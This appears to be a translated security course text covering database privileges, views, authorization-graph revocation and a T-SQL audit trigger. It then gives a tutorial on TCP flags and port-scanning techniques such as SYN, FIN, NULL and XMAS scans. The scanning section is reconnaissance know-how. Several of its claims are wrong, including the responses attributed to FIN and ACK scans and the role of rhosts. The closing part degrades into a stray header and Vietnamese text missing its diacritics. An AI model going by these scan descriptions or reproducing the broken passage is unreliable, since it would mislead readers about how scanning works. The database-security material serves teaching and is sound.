An access constraint generally relates to one part of the database. Given a suitable set of privileges, suppose a program checks every user request. The program orders the access checks by increasing complexity so that the final decision is reached as quickly as possible. Security at every level must be maintained if database security is to be guaranteed: a weakness at a low level (the physical or human level) allows the strict security measures of a high level (the database system level) to be broken.

c. Privileges when using a database system

Access privileges on a database can be divided as follows:

- Read authorization: the user may read, but not modify, the data.
- Insert authorization: the user may insert new data into the database, but not modify existing data.
- Update authorization: the user may modify the data, but not delete it.
- Delete authorization: the user may delete data.
- Permission to create and delete indexes.
- Permission to create new relations.
- Alteration: permission to add, modify or delete attributes of relations.
- Drop authorization: permission to delete relations.

A user may hold all of these privileges or only some of them. Besides these forms of data access authorization, a user may be granted permission to modify the database schema. Drop and delete differ: delete authorization only allows tuples to be removed. If a user deletes all tuples of a relation, the relation still exists but is empty; if a relation is dropped, it no longer exists.

To illustrate the nature of the problem, without loss of generality, the following statements are a few notions of the scope of information protection in database systems; they show levels of database access and the rights granted to each class of user:

- A user has unconditional access to the whole database, with every storage and query operation.
- A user is not allowed to access any part of the database, with any operation.
- A user may read exactly the content relating to their own work in the database, but may not modify or add to it.
- A user may read exactly the content relating to their own work in the database, and may modify and add to it.
- A user may read and modify the employee code, employee name and work-unit attributes periodically, during the first week of every month.
- A user is forbidden to read the annual-assessment attribute; the salary-level and salary-increase-date attributes may be read and modified, and all other attributes may only be read. The work may only be done between 9:00 and 11:00 on the days of the last week of the month.
- A user may apply statistical operations to the salary-level attribute to compute the average salary in each unit. Modifying the data is forbidden.

d. Views as a protection mechanism

A view, by redefining the conceptual database, not only makes application programming easier and increases logical data independence, but can also be used as a protection mechanism. There are two kinds of view.
The first kind is the read-only view, which does not allow modification. In many cases the database administrator lets one user only read the data while another may both read it and modify or add to it. The second kind of view allows reading and writing of the view's components, and every modification made through the view can be stored in the conceptual schema. SQL proposes read/write views within certain limits. With this method, application programs are more flexible to design than with read-only views. However, updates on read/write views often affect parts of the database that are not in the view. For example, in a hierarchical database a view may contain only the parent record type and not the dependent records; deleting an occurrence of that record type forces the deletion of the dependent record occurrences. This is an improper action: it violates the principle that a user must not be allowed to delete an object they cannot see in the view. The same happens in the network model when a record is deleted without knowing about other records outside the view that are related to it, and in many similar cases. For this reason every DBMS restricts the right to update views to a number of specific cases.

As an example from banking, a clerk needs to know the names of all customers who have loans at several branches. The clerk is not permitted to see information about the particular loans a customer may have. The clerk's direct access to the loan relation is refused, but access is possible through the view cust-loan, which contains the customer's name and the branch where the customer has a loan. The view can be defined in SQL as follows:

CREATE VIEW cust-loan AS
    (SELECT branch-name, customer-name
     FROM borrower, loan
     WHERE borrower.loan-number = loan.loan-number)

Suppose the clerk issues the following SQL query:

SELECT * FROM cust-loan

The clerk is allowed to see the result of this query, but its processing is carried out on the relations BORROWER and LOAN. The system must therefore check the privileges for the clerk's query before it starts processing the query. Creating a view does not depend on the source relations. A user who creates a view does not receive all privileges on that view.
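The cust-loan scenario above, as an added example that is not part of the original text: the view is created over borrower and loan in SQLite, and the DBMS-side privilege check that the text describes (reads of BORROWER and LOAN are refused unless they happen on behalf of the view) is modelled with SQLite's statement authorizer, which is consulted while a statement is compiled. The table rows, the protected-table policy and the underscore names (SQLite identifiers cannot contain a hyphen) are assumptions of this example.

```python
import sqlite3

# Constructed sample schema and rows for the bank example in the text
# (borrower/loan relations and the cust_loan view). SQLite identifiers
# cannot contain '-', so the names use underscores instead.
SCHEMA = """
CREATE TABLE loan (loan_number TEXT PRIMARY KEY, branch_name TEXT, amount INTEGER);
CREATE TABLE borrower (customer_name TEXT, loan_number TEXT);
CREATE VIEW cust_loan AS
    SELECT branch_name, customer_name
    FROM borrower, loan
    WHERE borrower.loan_number = loan.loan_number;
INSERT INTO loan VALUES ('L-11', 'Downtown', 900), ('L-23', 'Redwood', 2000);
INSERT INTO borrower VALUES ('Jones', 'L-11'), ('Smith', 'L-23');
"""

# Relations the clerk may reach only through the view, never directly
# (an assumed policy for this example).
PROTECTED_TABLES = {"loan", "borrower"}
CLERK_VIEW = "cust_loan"


def clerk_authorizer(action, table, column, dbname, source):
    """Authorizer callback standing in for the DBMS privilege check.

    SQLite calls it while compiling each statement. For a column read,
    `table` and `column` name the underlying relation and `source` is the
    view (or trigger) on whose behalf the read happens, or None when the
    statement reads the relation directly.
    """
    if action == sqlite3.SQLITE_READ and table in PROTECTED_TABLES:
        return sqlite3.SQLITE_OK if source == CLERK_VIEW else sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK


def open_bank_db():
    """In-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def clerk_session(conn):
    """Attach the clerk's privilege check to an open connection."""
    conn.set_authorizer(clerk_authorizer)
    return conn


def clerk_query(conn, sql):
    """Run a clerk query; return the rows, or None when the check refused it."""
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.DatabaseError:  # raised as "not authorized" at compile time
        return None


if __name__ == "__main__":
    session = clerk_session(open_bank_db())
    print(clerk_query(session, "SELECT * FROM cust_loan"))   # allowed through the view
    print(clerk_query(session, "SELECT amount FROM loan"))   # None: direct read refused
```

The check runs before any row is read, which is the point the text makes: the query on the view is compiled into reads of the base relations, so the privilege decision has to be taken on those relations, not on the view name alone.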
For example, a user has no update privilege on a view unless they have update privilege on the relations over which the view is defined. If a user creates a view for which they lack the required privileges, the system rejects the request to create it. In the cust-loan example above, the creator of the view must have read privilege on both the BORROWER and LOAN relations.

e. Granting access privileges

A user is granted some privileges on the database, and those privileges may be passed on to other users. The database administrator must, however, take special care as privileges circulate among many users, so that the privileges can be revoked at any moment.

Figure 1: Database access authorization graph

For example, suppose that initially the database administrator grants update privilege on the LOAN relation of the bank database to users U1, U2 and U3, and that the privilege may in turn be passed on to other users. The passing of privileges from one user to another is described by an authorization graph. Its nodes are users, and there is an edge Ui → Uj if user Ui grants update privilege on LOAN to user Uj. The root of the graph is the database administrator. In Figure 1, user U5 is granted the privilege by two users, U1 and U2, while user U4 is granted it only by U1. A user holds a given privilege on the database if and only if there is a path from the root of the authorization graph, that is, from the database administrator's node to the user's node. Suppose the database administrator decides to revoke U1's privileges. Since U4's privilege derives from U1, U4's privilege is revoked as well. U5, however, was granted the privilege by both U1 and U2, so the administrator only removes the grant from U1 to U5 and does not revoke U2's update privilege on LOAN: U5 still holds update privilege on the LOAN relation. If the administrator then revokes U2's update privilege, U5 loses its privilege on the LOAN relation.

Figure 2: An attempt to defeat the revocation of privileges

There may be cases where a pair of cunning users tries to circumvent the revocation rules for granted privileges. Suppose the authorization graph is as in Figure 2a. Besides the edges from the root DBA to U1, U2 and U3, there are edges between U2 and U3 in both directions, from U2 to U3 and from U3 to U2. That is, the administrator grants the privilege to U1, U2 and U3; U2 additionally receives it from U3, and U3 additionally from U2. If the administrator revokes U3's privilege while keeping U2's, U3 keeps its access, because the path from the root to U3 still runs through U2, as in Figure 2b. If the privileges of both U2 and U3 are revoked at the same time, U2's and U3's privileges still survive through each other, as in Figure 2c. Only when the administrator removes the edges from U3 to U2 and from U2 to U3 do the privileges cease to lie on a path starting from the database administrator. The administrator therefore requires every edge in the authorization graph to be connected starting from the root node, that is, from the DBA. Consequently the edges between U2 and U3 in both directions are removed: the grants from U2 to U3 and from U3 to U2 must be revoked, as in Figure 3.
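The root-reachability rule just described, carried through in code as an added example (not from the original text): a grant graph for one privilege, where a user holds the privilege only while some path from the DBA reaches them, and where a revocation cascades by dropping every edge whose grantor is no longer reachable. Both scenarios from the text are covered, the U4/U5 case of Figure 1 and the mutual U2/U3 grants of Figure 2. The class and method names are this example's own.

```python
from collections import defaultdict, deque

DBA = "DBA"  # root of the authorization graph


class AuthorizationGraph:
    """Grant graph for a single privilege (for example UPDATE on LOAN).

    Nodes are users; an edge grantor -> grantee records one GRANT. A user
    holds the privilege iff a path leads from the DBA to that user, and a
    revocation removes every edge that no longer lies on such a path.
    """

    def __init__(self):
        self.edges = defaultdict(set)  # grantor -> set of grantees

    def grant(self, grantor, grantee):
        # Only a current holder (or the DBA) can pass the privilege on.
        if grantor != DBA and not self.has_privilege(grantor):
            raise PermissionError(f"{grantor} cannot grant a privilege it does not hold")
        self.edges[grantor].add(grantee)

    def reachable(self):
        """Every user connected to the DBA node, the DBA itself included."""
        seen, queue = {DBA}, deque([DBA])
        while queue:
            user = queue.popleft()
            for grantee in self.edges[user]:
                if grantee not in seen:
                    seen.add(grantee)
                    queue.append(grantee)
        return seen

    def has_privilege(self, user):
        return user in self.reachable()

    def revoke(self, grantor, grantee):
        """Remove one grant, then cascade.

        Any edge whose grantor is no longer reachable from the DBA is
        deleted as well; this is what defeats the mutual U2 <-> U3 grants.
        Returns the list of cascaded (grantor, grantee) edges removed.
        """
        self.edges[grantor].discard(grantee)
        live = self.reachable()
        removed = []
        for user in list(self.edges):
            if user not in live:
                removed.extend((user, g) for g in self.edges[user])
                self.edges[user].clear()
        return removed


if __name__ == "__main__":
    g = AuthorizationGraph()
    for u in ("U1", "U2", "U3"):
        g.grant(DBA, u)
    g.grant("U2", "U3")
    g.grant("U3", "U2")
    g.revoke(DBA, "U3")
    print("U3 still holds privilege via U2:", g.has_privilege("U3"))   # True
    print("cascaded removals:", g.revoke(DBA, "U2"))                  # both mutual edges
```

The cascade is computed from the root rather than edge by edge, which is why the pair of users in Figure 2 gains nothing from granting to each other: once neither is reachable from the DBA, both of their edges are dropped in the same revocation.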

Figure 3: Database access authorization graph

f. Audit trails

Many database security applications need to maintain an audit trail. An audit trail is a record of every change made by storage operations such as inserting, deleting and modifying information in the database, together with the extra information produced while they were performed. The audit trail helps trace causes quickly and accurately. For example, if an account is found to be out of balance, the administrator can trace all updates made to the account to find the incorrect (possibly fraudulent) update and who performed it. An audit trail can be built by defining suitable triggers on relation updates (using system-defined values to identify the user name and the time of access). Many database systems, however, provide a convenient and easy-to-use way of creating an audit trail.

2. Auditing changes in a database

In several projects I have been through, tracing the actions that took place in the database was extremely important; there are many solutions and just as many difficulties, so here I present a fairly simple yet very effective approach, and if this article is useful to you, do not hesitate to leave your comments under it. How will you track changes in the database when a user deletes or edits data? You have a few approaches:

Create a column named isDeleted: at first sight this idea is good. Whenever a row is deleted it is not really removed but only marked, which solves the delete problem, but it runs into trouble with data constraints. Imagine a user table organized as ID-UserName-Password plus the isDeleted column. As you know, USERNAME must be unique in the system; it can only be registered again when someone has cancelled it or when it does not exist yet.

Now I delete username=xyz, meaning username=xyz is isDeleted, and then I insert username xyz again. The integrity constraint I now need on the database rests on the isDeleted column: my constraint must require username and isDeleted together to be unique. Fine, but in this case it is not sound: you are forced to create a constraint on a column that takes no part in the system's business logic, which ought to be avoided. Moreover, what happens if I insert username=xyz, delete it, create it again, and delete it again? You now always have to check before inserting data, and you may well ask yourself what constraints in the database were invented for.

Create a copy of the database: anyone who has worked with Oracle knows it supports a kind of audit table for tracking insert, delete and update. It does not have to be Oracle; in other databases you can easily set this up as well, simply as follows: create a log database identical to the original, adding to each table a column "action" for update and delete (insert is optional); create a trigger on each table so that whenever the original database changes, the corresponding event is inserted into the log table. In my opinion this solution is quite good: first, it does not burden the original database, since deleted data moves to the log database instead of bloating the original, and it is easy to see that queries on the original database run faster with less data in it. Its problem is that it is hard to manage: you have to write management code for every table, which is tedious indeed.

Use a single table as the Audit table.

The script that creates this table is as follows:

CREATE TABLE Audit (
    Type       CHAR(1),
    TableName  VARCHAR(128),
    PK         VARCHAR(1000),
    FieldName  VARCHAR(128),
    OldValue   VARCHAR(1000),
    NewValue   VARCHAR(1000),
    UpdateDate datetime,
    UserName   VARCHAR(128))

With this approach, I explain the fields as follows:
- AuditID: an auto-incrementing id.
- Type: the action; it can be D (Delete), I (Insert) or U (Update).
- TableName: the table on which the action occurred.
- PrimaryKeyField: the primary key of the affected row (for a table with one primary-key column; following Agile, if you want something different, customize the code).
- PrimaryKeyValue: the value of the primary-key column.
- FieldName: the column on which the action occurred.
- OldValue: the old value before the change.
- NewValue: the new value after the change.
- UpdateDate: the date and time of the action.
- UserName: the user (I use the system user; use a username from another table if you prefer).

(The CREATE TABLE script above keeps the key in the single PK column and has no AuditID column; the field list describes the intended design.)

Looking at the result table you can probably picture the idea.

-- Set up the audit tables
-- Firstly, we create the audit table. There will only need to be one of these in a database

IF NOT EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[Audit]') AND OBJECTPROPERTY(id, N'IsUserTable') = 1)
CREATE TABLE Audit (
    Type       CHAR(1),
    TableName  VARCHAR(128),
    PK         VARCHAR(1000),
    FieldName  VARCHAR(128),
    OldValue   VARCHAR(1000),
    NewValue   VARCHAR(1000),
    UpdateDate datetime,
    UserName   VARCHAR(128))
GO

-- now we will illustrate the use of this tool
-- by creating a dummy test table called TrigTest.

IF EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[trigtest]') AND OBJECTPROPERTY(id, N'IsUserTable') = 1)
DROP TABLE [dbo].[trigtest]
GO

CREATE TABLE trigtest (i INT NOT NULL, j INT NOT NULL, s VARCHAR(10), t VARCHAR(10))
GO

-- note that for this system to work there must be a primary key to the table
-- but then a table without a primary key isn't really a table is it?
ALTER TABLE trigtest ADD CONSTRAINT pk PRIMARY KEY (i, j)
GO

-- and now create the trigger itself. This has to be created for every
-- table you want to monitor
CREATE TRIGGER tr_trigtest ON trigtest FOR INSERT, UPDATE, DELETE
AS

DECLARE @bit        INT,
        @field      INT,
        @maxfield   INT,
        @char       INT,
        @fieldname  VARCHAR(128),
        @TableName  VARCHAR(128),
        @PKCols     VARCHAR(1000),
        @sql        VARCHAR(2000),
        @UpdateDate VARCHAR(21),
        @UserName   VARCHAR(128),
        @Type       CHAR(1),
        @PKSelect   VARCHAR(1000)

-- You will need to change @TableName to match the table to be audited
SELECT @TableName = 'trigtest'

-- date and user
SELECT @UserName   = SYSTEM_USER,
       @UpdateDate = CONVERT(VARCHAR(8), GETDATE(), 112) + ' ' + CONVERT(VARCHAR(12), GETDATE(), 114)

-- Action
IF EXISTS (SELECT * FROM inserted)
    IF EXISTS (SELECT * FROM deleted)
        SELECT @Type = 'U'
    ELSE
        SELECT @Type = 'I'
ELSE
    SELECT @Type = 'D'

-- get list of columns
SELECT * INTO #ins FROM inserted
SELECT * INTO #del FROM deleted

-- Get primary key columns for full outer join
SELECT @PKCols = COALESCE(@PKCols + ' and', ' on') + ' i.' + c.COLUMN_NAME + ' = d.' + c.COLUMN_NAME
FROM INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk,
     INFORMATION_SCHEMA.KEY_COLUMN_USAGE c
WHERE pk.TABLE_NAME = @TableName
  AND CONSTRAINT_TYPE = 'PRIMARY KEY'
  AND c.TABLE_NAME = pk.TABLE_NAME
  AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME

-- Get primary key select for insert
SELECT @PKSelect = COALESCE(@PKSelect + '+', '')
    + '''<' + COLUMN_NAME + '=''+convert(varchar(100), coalesce(i.' + COLUMN_NAME + ',d.' + COLUMN_NAME + '))+''>'''
FROM INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk,
     INFORMATION_SCHEMA.KEY_COLUMN_USAGE c
WHERE pk.TABLE_NAME = @TableName
  AND CONSTRAINT_TYPE = 'PRIMARY KEY'
  AND c.TABLE_NAME = pk.TABLE_NAME
  AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME

IF @PKCols IS NULL
BEGIN
    RAISERROR('no PK on table %s', 16, -1, @TableName)
    RETURN
END

SELECT @field = 0, @maxfield = MAX(ORDINAL_POSITION)
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = @TableName

WHILE @field < @maxfield
BEGIN
    SELECT @field = MIN(ORDINAL_POSITION)
    FROM INFORMATION_SCHEMA.COLUMNS
    WHERE TABLE_NAME = @TableName AND ORDINAL_POSITION > @field

    -- COLUMNS_UPDATED() is a bitmask, one bit per column: locate this column's byte and bit
    SELECT @bit  = (@field - 1) % 8 + 1
    SELECT @bit  = POWER(2, @bit - 1)
    SELECT @char = ((@field - 1) / 8) + 1

    IF SUBSTRING(COLUMNS_UPDATED(), @char, 1) & @bit > 0 OR @Type IN ('I', 'D')
    BEGIN
        SELECT @fieldname = COLUMN_NAME
        FROM INFORMATION_SCHEMA.COLUMNS
        WHERE TABLE_NAME = @TableName AND ORDINAL_POSITION = @field

        -- one Audit row per column whose value differs between the old and new image
        SELECT @sql = ' insert Audit ( Type, TableName, PK, FieldName, OldValue, NewValue, UpdateDate, UserName)'
            + ' select ''' + @Type + ''',''' + @TableName + ''',' + @PKSelect
            + ',''' + @fieldname + ''''
            + ',convert(varchar(1000),d.' + @fieldname + ')'
            + ',convert(varchar(1000),i.' + @fieldname + ')'
            + ',''' + @UpdateDate + ''''
            + ',''' + @UserName + ''''
            + ' from #ins i full outer join #del d' + @PKCols
            + ' where i.' + @fieldname + ' <> d.' + @fieldname
            + ' or (i.' + @fieldname + ' is null and d.' + @fieldname + ' is not null)'
            + ' or (i.' + @fieldname + ' is not null and d.' + @fieldname + ' is null)'
        EXEC (@sql)
    END
END
GO

The code above works perfectly: it goes into the system catalogue and finds all the tables in the schema, then creates each trigger from a fixed template (as the comment in the script says, the trigger has to be created for every table you want to monitor, with @TableName changed to match). Restrict the tables or columns by customizing this code.

Note: this code runs on Microsoft SQL Server and uses triggers; adapt it for other databases. It cannot be done on a database that does not support triggers.

Benefits: everything goes through a single table, which makes administration convenient and easy; if the system keeps spawning new tables, that is not a problem.

Drawbacks: a little performance cost. For small and medium databases auditing is fine, but on a large database heavy use of Insert and Delete will produce huge amounts of data per row (because it stores one field per audit row). For every kind of database, large or small, if you only track the Update action this is the best approach. For Delete, customize the code to track the minimum of fields needed, or apply the second logging method on top of this code.
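The "one Audit table, one row per changed column" design of the script above, re-expressed as an added example that is not the page's T-SQL and is not tied to SQL Server: the triggers are generated from the catalogue (PRAGMA table_info) for any table that has a primary key, and an UPDATE is logged only for columns whose value actually changed, which is what the COLUMNS_UPDATED() test and the full outer join achieve in the original. It runs on SQLite so it can be tried offline. The Audit column names follow the script; the AuditID column, the audit_context table (SQLite has no SYSTEM_USER, so the application records the acting user there) and the trigger names are assumptions of this example.

```python
import sqlite3

# Audit table as in the text, plus an AuditID and an audit_context table
# (both assumptions of this example, not part of the original script).
AUDIT_DDL = """
CREATE TABLE IF NOT EXISTS Audit (
    AuditID    INTEGER PRIMARY KEY AUTOINCREMENT,
    Type       CHAR(1) NOT NULL,          -- I, U or D
    TableName  TEXT    NOT NULL,
    PK         TEXT    NOT NULL,          -- '<col=value>' pairs, as in the T-SQL script
    FieldName  TEXT    NOT NULL,
    OldValue   TEXT,
    NewValue   TEXT,
    UpdateDate TEXT    NOT NULL,
    UserName   TEXT    NOT NULL
);
CREATE TABLE IF NOT EXISTS audit_context (user_name TEXT NOT NULL);
"""


def set_audit_user(conn, user_name):
    """Record the acting application user; the triggers copy it into UserName."""
    conn.execute("DELETE FROM audit_context")
    conn.execute("INSERT INTO audit_context VALUES (?)", (user_name,))


def table_columns(conn, table):
    """Return (primary-key columns in key order, all columns) from the catalogue."""
    info = conn.execute(f'PRAGMA table_info("{table}")').fetchall()  # cid, name, type, notnull, dflt, pk
    cols = [row[1] for row in info]
    pk = [row[1] for row in sorted((r for r in info if r[5] > 0), key=lambda r: r[5])]
    if not pk:
        raise ValueError(f"no PK on table {table}")  # same rule as the T-SQL version
    return pk, cols


def _pk_expr(pk_cols, alias):
    # Builds e.g. '<i=1><j=2>' from the NEW or OLD pseudo-row inside the trigger.
    return " || ".join(f"""'<{c}=' || {alias}."{c}" || '>'""" for c in pk_cols)


def install_audit_triggers(conn, table):
    """Generate INSERT/UPDATE/DELETE triggers that log one Audit row per column."""
    pk_cols, cols = table_columns(conn, table)
    user = "(SELECT user_name FROM audit_context LIMIT 1)"

    def audit_insert(kind, pk_alias, col, old, new):
        return ("INSERT INTO Audit(Type,TableName,PK,FieldName,OldValue,NewValue,UpdateDate,UserName) "
                f"VALUES ('{kind}','{table}',{_pk_expr(pk_cols, pk_alias)},'{col}',{old},{new},"
                f"datetime('now'),{user});")

    statements = [
        f'CREATE TRIGGER "aud_{table}_ins" AFTER INSERT ON "{table}" FOR EACH ROW BEGIN '
        + "".join(audit_insert("I", "NEW", c, "NULL", f'NEW."{c}"') for c in cols) + " END;",
        f'CREATE TRIGGER "aud_{table}_del" AFTER DELETE ON "{table}" FOR EACH ROW BEGIN '
        + "".join(audit_insert("D", "OLD", c, f'OLD."{c}"', "NULL") for c in cols) + " END;",
    ]
    for c in cols:  # one UPDATE trigger per column, fired only when that value changed
        statements.append(
            f'CREATE TRIGGER "aud_{table}_upd_{c}" AFTER UPDATE OF "{c}" ON "{table}" FOR EACH ROW '
            f'WHEN OLD."{c}" IS NOT NEW."{c}" BEGIN '
            + audit_insert("U", "OLD", c, f'OLD."{c}"', f'NEW."{c}"') + " END;")
    conn.executescript("\n".join(statements))


def audit_rows(conn, table):
    return conn.execute(
        "SELECT Type, PK, FieldName, OldValue, NewValue, UserName FROM Audit "
        "WHERE TableName = ? ORDER BY AuditID", (table,)).fetchall()


def demo():
    """Constructed walk-through on the trigtest table from the text."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(AUDIT_DDL)
    conn.execute("CREATE TABLE trigtest (i INT NOT NULL, j INT NOT NULL, "
                 "s VARCHAR(10), t VARCHAR(10), PRIMARY KEY (i, j))")
    install_audit_triggers(conn, "trigtest")
    set_audit_user(conn, "alice")
    conn.execute("INSERT INTO trigtest VALUES (1, 2, 'a', 'b')")            # 4 'I' rows
    conn.execute("UPDATE trigtest SET s = 'c' WHERE i = 1 AND j = 2")       # 1 'U' row
    conn.execute("UPDATE trigtest SET s = 'c' WHERE i = 1 AND j = 2")       # unchanged: nothing
    conn.execute("DELETE FROM trigtest WHERE i = 1")                        # 4 'D' rows
    return audit_rows(conn, "trigtest")


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Because every column of every inserted or deleted row becomes its own Audit row, this layout has exactly the drawback noted in the text for Insert- and Delete-heavy tables; limiting `cols` to the fields worth tracking is the place to customize it.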

3. Database security methods

Basic security structure

Businesses today seem to focus so much on individual security components that they lose sight of the whole picture: without a basic security organization, any security policy will fail. System administrators tend to manage security according to their own preferences, with little or no oversight from higher management. This raises questions: Who makes sure that the system administrator follows the security guidelines? How does an organization ensure that all system administrators apply the latest patches? What guarantees that the latest patches have been tested so that they do not themselves cause system failures? Who verifies security for the whole corporation, or for each of its parts?

A broadly effective network security organization

Even with a suitable structure you will still run into confusion over matters as important as security, and that confusion causes no small upheaval. For example: Jim at the East Coast office applies all the patches, but he has an insecure link to Bill on the West Coast, who failed to configure his firewall properly. That alone is enough for a devastating attack. Faced with such cases, you need to review everything when setting up the basic security structure. Now, having a basic security organization for the system, we start to look at the technical issues of database security.

Database vulnerabilities (if you want a security war!)

Database security can basically be attacked in the following areas:

- Server Security
- Database Connection
- Table Access Control
- Restricting Database Access

Server Security

Server security is the practice of limiting real access to the database service itself. This is the most important aspect of security, and you should plan it carefully. Its basic idea is: you cannot access what you cannot see. The database server is not a web server and should not accept anonymous connections. When it has to feed a dynamic website, your database should not sit on the same machine as the web server; that is good not only for security but also for performance. If the database serves a web server, configure it to accept connections only from that web server.

Trusted IP access: restrict the database service to answering requests only from the known IP address of the web server.

Trusted IP addresses: each server should be configured to talk only to trusted IP addresses. Just as at home you do not let your children talk to strangers, here too you should know exactly who is allowed to talk to the database server. If the endpoint is a web server, only the web server's address should be allowed to reach the database server. If the database server feeds a main application running on the internal network, restrict the addresses to the internal network. Do not leave the weak state of web databases on the same server as internal database information.

Database Connection

Dynamic applications are now causing many people to update the database directly without validation. If you let users update the database through a web page, make sure that the update is safe. For instance with SQL source, an ordinary user should never be able to enter data unless that data has been examined. If you need to use ODBC connections, make sure that only a limited number of users have access to the shared file. Has every employee in your company ever had the keys to every room in the company? So never let user accounts use every connection and data source on the server.

Table Access Control

Table access control is one of the most frequently neglected forms of database security, because it is hard to inherit and apply. Using table access control properly requires the cooperation of both the system administrator and the database developer, and we all know that cooperation is a rare word in the IT industry. Many users will attribute their access rights to the system administrator leaving the database at the public level; or, if a table is used only for system purposes, why does it have access rights other than admin? Unfortunately, table structure, proper relational database design and development are outside the scope of this article; perhaps we will discuss them in a later one.

Restricting Database Access

This is the last item of the database security overview we are looking at. Its main concern is system network access, focused on Internet databases. Most targets of today's attacks are network-based databases, and every web application has ports that attackers can listen on. Cybercriminals now mostly use a simple port scan to find the default open ports of popular database systems. They are called defaults because you can change the ports on which services listen, which is a good way to avoid attacks. First they try to probe whether a machine exists at a given address.
They use the ping command, simply by opening a command window and typing ping, for example:

C:\ ping 127.0.0.1

or

root@localhost:~$ ping 127.0.0.1

The reply may look like:

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Example of the ping command

Cybercriminals today know very well how systems at these addresses reply. The first countermeasure is to disable ICMP packets, which also blocks the reply to a ping request. There are many ways to block open Internet access; every database system has its own unique set of components, as does every operating system. Only a few methods are given here:

- Trusted IP addresses: UNIX services can be configured to answer pings only from a list of trusted hosts. On UNIX this is done fully by configuring the rhosts file, which limits access to the server to a list of specific users.
- Disabling server accounts: if you suspend a server ID after 3 wrong passwords, you have stalled the attack. Otherwise an attacker can run a program that generates millions of passwords until it guesses the right ID and password of a user.
- Special tools: you can use products such as RealSecure by ISS, which sends an alert when an outside service is trying to breach your system's security.

The Oracle database has many authentication methods:

- Kerberos security: the popular ticket, which avoids having to use the basic authentication system.
- Virtual Private Database (VPD): VPD technology can limit access by selecting certain rows of a column.
- Grant-execute security: execute privilege on a subprogram can be tightly bound to a user. When the user runs the subprogram they are granted access to the database, but only within the scope of that subprogram.
- Authentication services: security authentication services provide pre-defined identification of external users.
- Port access security: every Oracle application listens directly on a specific port on the server. Like any standard HTTP service, the Oracle Web Listener can be configured to restrict access.

VI. NETWORK ASSESSMENT AND ANALYSIS TOOLS

1. Open port scanning skills

In this article I present the basic principles of port scanning on a system, the scanning techniques that let us learn which ports a system is using. From these scanning concepts I also present a solution for preventing scans of a system. The article covers:
- How TCP/IP transmits information
- Principles and methods of port scanning
- Using the Nmap software

a. How TCP/IP transmits information

a.1. Structure of the TCP packet

In this article I focus only on the flag settings in the TCP packet, since they are what port scanning uses:
- The SYN flag requests a connection between two computers
- The ACK flag replies that the connection between the two machines can begin

- The FIN flag ends the connection between the two machines
- The RST flag, sent by the server, tells the client that this communication is refused (cannot be used)
- The PSH flag is used together with the URG flag
- The URG flag sets the priority of this packet

In fact each of these flags in the packet is just a 1 or a 0: 0 means the TCP packet does not set that flag, 1 means the flag is set, each in turn within the 8 bits of the Flags field.

a.2. The three steps that start a TCP connection

+ Step I: the client sends the server a SYN packet
+ Step II: the server replies to the client with a SYN/ACK packet
+ Step III: when the client receives the SYN/ACK it sends the server an ACK, and the exchange of data between the two machines begins.

a.3. The four steps that end a TCP connection

+ Step I: the client sends the server a FIN/ACK packet
+ Step II: the server sends the client an ACK packet
+ Step III: the server in turn sends the client a FIN/ACK packet

+ Step IV: the client sends the server an ACK, and the disconnection between server and client is complete.

b. Principles of port scanning on a system

b.1. TCP scanning

TCP/UDP packets have 16 bits for the port number, which means ports 1 – 65535. No hacker scans every port on a system; they scan only the most commonly used ports, usually only ports 1 to 1024. Earlier in this article I presented how connections between two computers on a network are set up and torn down. Based on these TCP rules I can find out which ports are open on a system with the following methods:

- SYN scan: the client sends a SYN packet for a specific port to the server; if the server returns SYN/ACK the client knows that port is open on the server. If the server returns RST/SYN, I know that port on the server is closed.
- FIN scan: the client has no connection to the server but still builds a FIN packet for the given port and sends it to the server being scanned. If the server returns ACK the client knows the port is open; if the server returns RST the client knows the port is closed.
- NULL scan: the client sends the server TCP packets for the port being scanned with no flags set; if the server returns RST, I know the port on the server is closed.
- XMAS scan: the client sends TCP packets for the port being scanned with several flags set, such as FIN, URG and PSH. If the server returns RST, I know the port on the server is closed.
- TCP connect: this very practical method sends the server genuine connection requests to specific ports on the server. If the server returns SYN/ACK the client knows the port is open; if the server returns RST/ACK the client knows the port on the server is closed.
- ACK scan: this scan aims to find the access control lists on the server. The client tries to reach the server with an ICMP packet; if it receives Host Unreachable, the client understands that the port on the server is filtered.

There are a few scan types for typical services that are easy to attack, such as:

[TL: o to v An ton thng tin cho ABC

6, 2012

- RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng. - Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt s port nht nh. - FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay khng - IDLE y l dng Passive Scan, sniffer v a ra kt lun my tnh m port no. Phng thc ny chnh xc nhng i khi khng y bi c nhng port trn my tnh m nhng khng c giao tip th phng thc ny cng khng scan c b.2. UDP Scan. Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c truyn ti ch. Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu nhanh vi cc gi tin nh. Vi qu trnh thc hin truyn tin bng TCP k tn cng d dng Scan c h thng ang m nhng port no da trn cc thng s Flag trn gi TCP. Cu to gi UDP

